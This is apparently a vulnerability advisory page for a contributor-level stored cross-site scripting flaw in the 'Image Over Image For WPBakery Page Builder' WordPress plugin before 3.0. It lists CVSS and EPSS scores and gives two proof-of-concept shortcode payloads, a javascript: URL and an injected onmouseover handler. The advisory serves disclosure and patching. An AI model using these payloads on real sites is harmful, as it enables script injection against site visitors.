Lucene search

K
wpexploitLana CodesWPEX-ID:702D7BBE-93CC-4BC2-B41D-CB66E08C99A7
HistoryMar 08, 2023 - 12:00 a.m.

Image Over Image For WPBakery Page Builder < 3.0 - Contributor+ Stored XSS

2023-03-0800:00:00
Lana Codes
52

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

4.9 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:P/I:P/A:N

0.0004 Low

EPSS

Percentile

12.0%

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

[image_over_image_vc ioi_caption_url='javascript:alert(/XSS/)'] 
[image_over_image_vc ioi_image_effect='" onmouseover="alert(1)" style="background:red;width:100px;height:100px;display:block;"']

Other affected attribute: ioi_url_target

5.4 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

4.9 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:P/I:P/A:N

0.0004 Low

EPSS

Percentile

12.0%

Related for WPEX-ID:702D7BBE-93CC-4BC2-B41D-CB66E08C99A7